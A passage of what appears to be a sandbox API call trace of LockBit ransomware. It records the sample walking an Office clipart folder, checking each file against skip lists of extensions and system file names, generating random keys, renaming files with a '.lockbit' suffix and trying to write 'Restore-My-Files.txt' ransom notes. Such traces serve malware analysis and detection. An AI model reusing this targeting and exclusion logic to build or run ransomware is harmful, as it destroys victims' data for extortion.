(lpString1=".7z", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.253] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF.lockbit") returned 72 [0139.253] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106958.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.254] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.254] malloc (_Size=0x40068) returned 0x3df0008 [0139.254] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13784) returned 1 [0139.254] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.255] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.255] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.255] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.255] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.255] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.255] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.276] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.276] malloc (_Size=0xa6) returned 0x77d7a8 [0139.276] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.303] free (_Block=0x77d7a8) [0139.303] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.303] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.303] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.303] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107024.WMF", cAlternateFileName="")) returned 1 [0139.303] lstrcmpiW (lpString1=".", lpString2="J0107024.WMF") returned -1 [0139.303] lstrcmpiW (lpString1="..", lpString2="J0107024.WMF") returned -1 [0139.303] PathFindExtensionW (pszPath="J0107024.WMF") returned=".WMF" [0139.303] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.304] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.304] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107024.WMF") returned 1 [0139.305] lstrcmpiW (lpString1="ntldr", lpString2="J0107024.WMF") returned 1 [0139.305] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107024.WMF") returned 1 [0139.305] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107024.WMF") returned -1 [0139.305] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107024.WMF") returned -1 [0139.305] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107024.WMF") returned 1 [0139.305] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107024.WMF") returned -1 [0139.305] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.305] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF") returned=".WMF" [0139.305] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.305] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.305] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.306] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.306] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF.lockbit") returned 72 [0139.306] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107024.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.307] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.307] malloc (_Size=0x40068) returned 0x3df0008 [0139.307] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3020) returned 1 [0139.307] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.307] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.307] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.308] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.308] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0139.313] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.313] malloc (_Size=0xa6) returned 0x77d7a8 [0139.313] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0139.313] free (_Block=0x77d7a8) [0139.313] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.313] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.313] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.313] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1dd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107026.WMF", cAlternateFileName="")) returned 1 [0139.313] lstrcmpiW (lpString1=".", lpString2="J0107026.WMF") returned -1 [0139.313] lstrcmpiW (lpString1="..", lpString2="J0107026.WMF") returned -1 [0139.313] PathFindExtensionW (pszPath="J0107026.WMF") returned=".WMF" [0139.313] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.313] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.313] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.313] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.313] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.313] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.313] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.313] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.313] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.313] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.313] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.313] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.314] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.314] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107026.WMF") returned 1 [0139.315] lstrcmpiW (lpString1="ntldr", lpString2="J0107026.WMF") returned 1 [0139.315] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107026.WMF") returned 1 [0139.315] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107026.WMF") returned -1 [0139.315] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107026.WMF") returned -1 [0139.315] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107026.WMF") returned 1 [0139.315] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107026.WMF") returned -1 [0139.315] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.315] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF") returned=".WMF" [0139.315] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.315] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.315] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.316] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.316] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF.lockbit") returned 72 [0139.316] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107026.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.317] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.317] malloc (_Size=0x40068) returned 0x3df0008 [0139.317] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7632) returned 1 [0139.317] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.317] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.317] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.318] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.318] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.318] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.323] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.323] malloc (_Size=0xa6) returned 0x77d7a8 [0139.323] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0139.324] free (_Block=0x77d7a8) [0139.324] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.324] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.324] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.324] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2358, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107042.WMF", cAlternateFileName="")) returned 1 [0139.324] lstrcmpiW (lpString1=".", lpString2="J0107042.WMF") returned -1 [0139.324] lstrcmpiW (lpString1="..", lpString2="J0107042.WMF") returned -1 [0139.324] PathFindExtensionW (pszPath="J0107042.WMF") returned=".WMF" [0139.324] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.324] 